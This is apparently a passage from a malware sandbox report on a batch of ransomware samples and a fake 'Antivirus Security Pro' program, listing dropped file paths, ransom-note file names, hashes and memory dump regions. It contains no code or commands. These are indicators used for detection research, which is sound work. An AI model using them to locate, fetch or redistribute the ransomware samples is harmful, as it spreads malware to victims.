ccc923b2bcc3443852e74db6b8f0db09a2ec4dcb

SHA256
df23456f0ee2014e7ba2054827cddb9f0e7697488f74cd76050bb3903fea95c3

SHA512
a54c721da6027ea44dfa7002c46f5c4883f544fed1cbb313892e161cd9aa14d023f8db3d3d87ae9e69e15259ca5ef995e0e7d5fbe37a29e9267894e807f9224b

Download Submit
C:\Users\Admin\AppData\Roaming\Gaxe\anli.exe

Filesize
67KB

MD5
2f2508d25d8906cfc56547b905507b77

SHA1
2f5cb77e91985f98b5ba256495065c0574bfa620

SHA256
5d7a0e6be3715387ef20f98cee3e84f1b6ad0c1ba1cca03aaf4573e3433f3ca2

SHA512
65a62ecb06e52ff40d1b994eec63b8f786ce0096da034ab196c84eaa1b784d4a63da60f905d18c564fc8333e74de38c3ac34b5c739a9d9f46d62ee7632e988ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Antivirus Security Pro\Antivirus Security Pro.lnk

Filesize
1KB

MD5
0290c50a6669ca37923d7d7665fe6ce0

SHA1
b63a05fc25ac02b1fe4e33170beffacad7f75370

SHA256
2ac5932a644792a9ca91945ddfb122845b6507ab353941298f79447e9b566ed7

SHA512
2891d4737ca8054243758ff01385be29ee00bd999872dcc9e78872afea2656281633636a06b3b1bf550b4ca1cc5549020a862bcf2908f0a22869c4659189f79c

Download Submit
C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Agent.gen-b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c.exe

Filesize
271KB

MD5
511bf43e720a8cf9131a1ba0ab89d089

SHA1
1ac25149aaa08db57d87e4fe0a3389da72752dc6

SHA256
b04fcd4778f72c0a66bd4319b54bc722365a4783ac2347bc77602f19e64da13c

SHA512
6f55a75aed1d0192a5207c9680a9b81e33f6f8ad4b85aaabcd8017d139352ca15a926a5239480d3b249ec936ae7352911b5ad560202316da725be6dc2b89a33e

Download Submit
C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Foreign.gen-c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823.exe

Filesize
772KB

MD5
61f53c0483e43651153f171aded347b8

SHA1
f8512f29d7153fe116243315f7e898330cc5622a

SHA256
c46c4c7d25251d2cce35a9da72561bcb3e84bcf2ce11ac8333af867d9266d823

SHA512
756ff2fdda157e35e5d0fdab7d6df3dfc3dbf0c1b5be07a43f73957668471d108183945fb229e827377d5a41a2ee5bd3f1a8f8a40c594c4ee4cc3cddd67fa001

Download Submit
C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Generic-27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a.exe

Filesize
184KB

MD5
41cf1192c09b5b5d66c8ae2957e53f24

SHA1
42c30796de0d2cfac56785f9291ed58cfc1b2199

SHA256
27030cb323893aff4c57b9bca6caef69e6dcac7b2a897bb1a26940935183076a

SHA512
ef08911de3efbfa52f9f1dd5e9b1b7e3d3d6146195810d8d686af2db04c1828a906473816c486d1cc8ac8ee93da893902611fa26e934d6fdeab795690133c83a

Download Submit
C:\Users\Admin\Desktop\00298\HEUR-Trojan-Ransom.Win32.Locky.vho-c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564.exe

Filesize
520KB

MD5
3db3efc2a27e1edecdb08cf55c71484b

SHA1
cd4dbef36d10e3c2454396d6301d88c20e0a73c4

SHA256
c6bb72e0a48fcf77920ddc48dd799f04a73ca287f56afb3dd5709725a67e8564

SHA512
f0ae1517a0926bce5956aef7e3c369f1d4d811bd42a692114825e92384f4e4b488f8fea046443c1a9839d420ab0ae6d66beaa6fb00a42e35ba3e3239bfd73f66

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.MyxaH.qbx-f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721.exe

Filesize
292KB

MD5
d0fdc97c51ec744a404aea38b7db4f62

SHA1
d3368b250792bc2b6187f7d10aaca0208f475fa7

SHA256
f6177cf7c64fd3b888db4ef8e4c5b7e89198bb99f28ef16e4ddf686bc0a07721

SHA512
91cc63fcdf53f627c03f24bb6eee7443535a5d0c2fa42badd825759e1c47f0bb2c70416e78e922426da433bc736d65e942c898089af98facb29dee9f260c19ef

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe

Filesize
241KB

MD5
21af27ba9ac8e0dc4124c57f82b7e514

SHA1
b653f8672df111229959112ba7d5c710f94dc578

SHA256
bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6

SHA512
ff90faab3d7a584fbedb2216ed7cc1101320bec809b91d4991c89202e1b634841383ac547a6c9bb1bf763d1c5534d0bc98b0ed2d7ebeb47f169e5bd938b706fd

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.jiv-f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73.exe

Filesize
376KB

MD5
5f9cc64782335cf5894acff93f5e47e1

SHA1
5092be5954bd999d4ff0706b755ff136e5f798f8

SHA256
f470b91f6fdbb9170b4fccffe1a7a25e50832c8658bdd0f4816e219d2d460b73

SHA512
99b5000dcd79b9641884484d303363d7bd30185df02889ff64c65e1d4deb81d4344b5bf5b5501bd1165273cd065763218037086820b18eb555f59b5fe7b952bb

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.lli-c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca.exe

Filesize
356KB

MD5
96c53da97c6cf0c79d278f0f69609ed6

SHA1
c57ae0b44b2feea3e4722c672e4d2c20aaa4d2de

SHA256
c1f58f6b35fba846df52983a880afa4aea441e19b446c753eff7da1a942c09ca

SHA512
08e04cecef4b1e4d6fc710115c1065de2d0e4ff358046ac5d00920a66814905af51f5859e4dbe92a7d2744fba092cb4addb96f349caaf608177de1766330bf44

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe

Filesize
328KB

MD5
05a30994821845197be5d1ebb616dbbb

SHA1
0bf4c283b2ecac2d8d94074248403d89754c688f

SHA256
73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c

SHA512
6bcffb9ec948aee21851e299a8a96a6c795c5546fad7d2f737ceb5f6d782975551b0f77e8e6c91450d5ee881f8e8d35eceb1944101eb94656b42a1e72c1e6073

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe

Filesize
480KB

MD5
066d2ad26631804e829ae726f1ab0ca2

SHA1
54f8bc5ac6932dc9975254c8dbc935b373ab8799

SHA256
0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4

SHA512
653b857a825b875a151b6e61e50f319f2acc96361ebe5d4dc67bf36935b4b6ee413843e3eb1b6503e7594272cc764823efe9c73c4eb68bfc04f430c3626d1dbf

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe

Filesize
312KB

MD5
4955011dc3f614063e98166cc26c908d

SHA1
aad7810fdf2b19bd605d4c7afe67a5e23c18d94f

SHA256
717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24

SHA512
87a40c5384eada78a2ff670ea7cf5310d6dc4104f9459b46001daf763904a18a3b1b2dca43fb150ae37fe07854eb83be5f70d2bafe9469fd63ef0d798bcc4584

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe

Filesize
656KB

MD5
01bf1173cda4026469a594d7e542b59d

SHA1
e6f5bd0d208c16690de67e9fe53934130703d37f

SHA256
8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d

SHA512
3c12c14dd5a6a80a549ab0bbfea39a983558438435cd781b4a58b10a66b39c9f5c9f24f8be0dfe73b2fa9df3a4dc3ac7cc06a12a92eb6a36810abfdedf4b9b36

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe

Filesize
615KB

MD5
ceec01f1321c4abd3a319adba71b8ce1

SHA1
3f775d67433a13693ac53bfd0e5bcff0e078c15c

SHA256
826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2

SHA512
ccff9e87a9cfe4a4016ae1320b280c2df6f119cac8d71a3c0f4f6b1e3dd4af5a8a693363c2d91bf0107b689eb5b2ce2d8a96cb91bcf32aa49b14ea2ad029f526

Download Submit
C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Foreign.jpdw-0b6bd6dbd74117ce41d96712e6f309bd9809732517b6320c8370e0e9434e7e98.exe

Filesize
107KB

MD5
045b1fbbf5463ae16959a85ebf173d11

SHA1
a6d35327837185a6e2f77230006236c68bbf4d7a

SHA256
0b6bd6dbd74117ce41d96712e6f309bd9809732517b6320c8370e0e9434e7e98

SHA512
85a27bbc0b696d1375c39afcbcc7435231f2fcc9a7a8191ace985da94c08d9bb3b293d92d1467cf2ca7fa6d969dd40936b299f93ca387900f547b2fa71e017fd

Download Submit
C:\Users\Admin\Desktop\Antivirus Security Pro support.url

Filesize
118B

MD5
6140a424002524d7050f031a7fe14cab

SHA1
14e96dd00dd328a36383a05c7a64290deb0bbf91

SHA256
aa84a926229bca32f8b156a647cce0c821a8820bf8dd8899f0603644b1cad66c

SHA512
5b81ff9f942092aa9779ae0f0bb9ff083345979ef87984da670a1c7df5a96c8b937af161f7d173226a31f3914343d2d4157ca0c63350f307837ce274fba02e34

Download Submit
C:\Users\Admin\Desktop\Antivirus Security Pro.lnk

Filesize
1KB

MD5
686c24a32f96e1610b478073cf7bd518

SHA1
d41a70954d157ce26311ee22ff50edf216d70e8c

SHA256
0937a109e282f371f5289090311daa663ba8b4f5598ea8a11cad11c73de5b1a1

SHA512
61b5eee928867ce28f5df6674c1053ccf28f0c331a9030acfe232adf6405d7b3dfa3a219f94902fb709222980ca895f9aed852f834422981a24002fa6fb91e6f

Download Submit
C:\Users\Admin\Downloads\README.hta

Filesize
66KB

MD5
c02565b760626753132da55f40953507

SHA1
7b8641a1b4d5727065a486143e3d10b8f1d06121

SHA256
c3bdca907892e179fb0d9eac49a97438a75ed2d5101ca6f7e69eb56cbc039de7

SHA512
82c670c6d6ddb3a4a129a4db2af9c57cfe2c812398d0430b1059bd4347f39cb0c371cc5fbd9f5c4931b324f7b4aaff03882d410e70b57a1e4fd14158c9942d52

Download Submit
C:\Users\Default\lukitus-7719.htm

Filesize
8KB

MD5
5fa02f76108be62e9ca2e05d17ecb7cd

SHA1
40316c9832d314d7f6f06360013575b0a17b06fa

SHA256
ca2447e0e3417b04b47cc2346f0932b19908fb108889716a7ebf11b3dbd84a66

SHA512
a10a7a8b1c8ebb6be91c7f01646fb1a1f15ed429ae2e9289a8b6c687c0e1ffd0f24ded80a51891e831c167cd0ae60c4026bad9ebf4db272729d7f1391297bcea

Download Submit
\Users\Admin\AppData\Local\Temp\nsoC063.tmp\System.dll

Filesize
11KB

MD5
a436db0c473a087eb61ff5c53c34ba27

SHA1
65ea67e424e75f5065132b539c8b2eda88aa0506

SHA256
75ed40311875312617d6711baed0be29fcaee71031ca27a8d308a72b15a51e49

SHA512
908f46a855480af6eacb2fb64de0e60b1e04bbb10b23992e2cf38a4cbebdcd7d3928c4c022d7ad9f7479265a8f426b93eef580afec95570e654c360d62f5e08d

Download Submit
\Users\Admin\AppData\Local\Temp\nszA8DF.tmp\System.dll

Filesize
11KB

MD5
ca332bb753b0775d5e806e236ddcec55

SHA1
f35ef76592f20850baef2ebbd3c9a2cfb5ad8d8f

SHA256
df5ae79fa558dc7af244ec6e53939563b966e7dbd8867e114e928678dbd56e5d

SHA512
2de0956a1ad58ad7086e427e89b819089f2a7f1e4133ed2a0a736adc0614e8588ebe2d97f1b59ab8886d662aeb40e0b4838c6a65fbfc652253e3a45664a03a00

Download Submit
\Users\Admin\AppData\Local\Temp\nszAC39.tmp\System.dll

Filesize
11KB

MD5
883eff06ac96966270731e4e22817e11

SHA1
523c87c98236cbc04430e87ec19b977595092ac8

SHA256
44e5dfd551b38e886214bd6b9c8ee913c4c4d1f085a6575d97c3e892b925da82

SHA512
60333253342476911c84bbc1d9bf8a29f811207787fdd6107dce8d2b6e031669303f28133ffc811971ed7792087fe90fb1faabc0af4e91c298ba51e28109a390

Download Submit
\Users\Admin\AppData\Roaming\NsResize.dll

Filesize
28KB

MD5
d53bd2d5591a78ea15b3bd59e2652bd6

SHA1
40968bcae13ee63469d241200679b25dfa5fdd4c

SHA256
1734bceb77dab6739b80575fd7ee87c437327d8eb147339e1d93b7d3235c5394

SHA512
c07bbab95251f16ac4b1c03e0324792b35badd111cced2e5c8e0de467226e572edfe5ca6e528c3494664f2569774f6a422806f54883cc2ef3726e21f4a011f5b

Download Submit
\Users\Admin\AppData\Roaming\SetCursor.dll

Filesize
60KB

MD5
0f5a2813ad885c51346bdd8bfb07b813

SHA1
f516a7a33b0f4a8e3c98b4012bb7dd10647d283e

SHA256
d027e27768aad7d9aa53bf9f97c35c7abf8fd9a4ace0eb2578de66ea52dee26e

SHA512
a1ff466ff12612f1c50547629eab227e1b05bd71181aa2e1e35e36e5f00d8addb58c4f8c58b3358066dacae33e7a5b4f62056bdc1751f6970e39ed4b01e261fc

Download Submit
memory/1044-194-0x0000000001E20000-0x0000000001E37000-memory.dmp

Filesize
92KB

Download
memory/1044-196-0x0000000001E20000-0x0000000001E37000-memory.dmp

Filesize
92KB

Download
memory/1044-198-0x0000000001E20000-0x0000000001E37000-memory.dmp

Filesize
92KB

Download
memory/1044-201-0x0000000001E20000-0x0000000001E37000-memory.dmp

Filesize
92KB

Download
memory/1044-199-0x0000000001E20000-0x0000000001E37000-memory.dmp

Filesize
92KB

Download
memory/1044-197-0x0000000001E20000-0x0000000001E37000-memory.dmp

Filesize
92KB

Download
memory/1044-190-0x0000000001E20000-0x0000000001E37000-memory.dmp

Filesize
92KB

Download
memory/1044-192-0x0000000001E20000-0x0000000001E37000-memory.dmp

Filesize
92KB

Download
memory/1068-203-0x0000000002200000-0x0000000002217000-memory.dmp

Filesize
92KB

Download
memory/1068-205-0x0000000002200000-0x0000000002217000-memory.dmp

Filesize
92KB

Download
memory/1068-207-0x0000000002200000-0x0000000002217000-memory.dmp

Filesize
92KB

Download
memory/1096-156-0x0000000000380000-0x000000000039F000-memory.dmp

Filesize
124KB

Download
memory/1096-173-0x00000000005C0000-0x00000000005D7000-memory.dmp

Filesize
92KB

Download
memory/1096-154-0x00000000002B0000-0x0000000000379000-memory.dmp

Filesize
804KB

Download
memory/1096-155-0x0000000000410000-0x00000000004AF000-memory.dmp

Filesize
636KB

Download
memory/1096-169-0x0000000000B40000-0x0000000000C49000-memory.dmp

Filesize
1.0MB

Download
memory/1096-157-0x00000000006F0000-0x000000000081D000-memory.dmp

Filesize
1.2MB

Download
memory/1128-214-0x0000000002C30000-0x0000000002C47000-memory.dmp

Filesize
92KB

Download
memory/1128-210-0x0000000002C30000-0x0000000002C47000-memory.dmp

Filesize
92KB

Download
memory/1128-212-0x0000000002C30000-0x0000000002C47000-memory.dmp

Filesize
92KB

Download
memory/1720-231-0x0000000001BF0000-0x0000000001C07000-memory.dmp

Filesize
92KB

Download
memory/1720-233-0x0000000001BF0000-0x0000000001C07000-memory.dmp

Filesize
92KB

Download
memory/1724-224-0x0000000001FD0000-0x0000000001FE7000-memory.dmp

Filesize
92KB

Download
memory/1724-226-0x0000000001FD0000-0x0000000001FE7000-memory.dmp

Filesize
92KB

Download
memory/1724-228-0x0000000001FD0000-0x0000000001FE7000-memory.dmp

Filesize
92KB

Download
memory/1996-219-0x0000000001BD0000-0x0000000001BE7000-memory.dmp

Filesize
92KB

Download
memory/1996-217-0x0000000001BD0000-0x0000000001BE7000-memory.dmp

Filesize
92KB

Download
memory/1996-221-0x0000000001BD0000-0x0000000001BE7000-memory.dmp

Filesize
92KB

Download
memory/2844-174-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2844-130-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2844-136-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2948-189-0x0000000003BD0000-0x0000000003BE7000-memory.dmp

Filesize
92KB

Download
memory/2948-184-0x00000000006E0000-0x000000000080D000-memory.dmp

Filesize
1.2MB

Download
memory/2948-183-0x00000000001D0000-0x00000000001EF000-memory.dmp

Filesize
124KB

Download
memory/2948-187-0x0000000002150000-0x0000000002259000-memory.dmp

Filesize
1.0MB

Download
memory/2948-185-0x0000000000810000-0x0000000000881000-memory.dmp

Filesize
452KB

Download
memory/2948-182-0x0000000000560000-0x00000000005FF000-memory.dmp

Filesize
636KB

Download
memory/2948-181-0x0000000000490000-0x0000000000559000-memory.dmp

Filesize
804KB

Download
memory/2948-186-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/2948-176-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download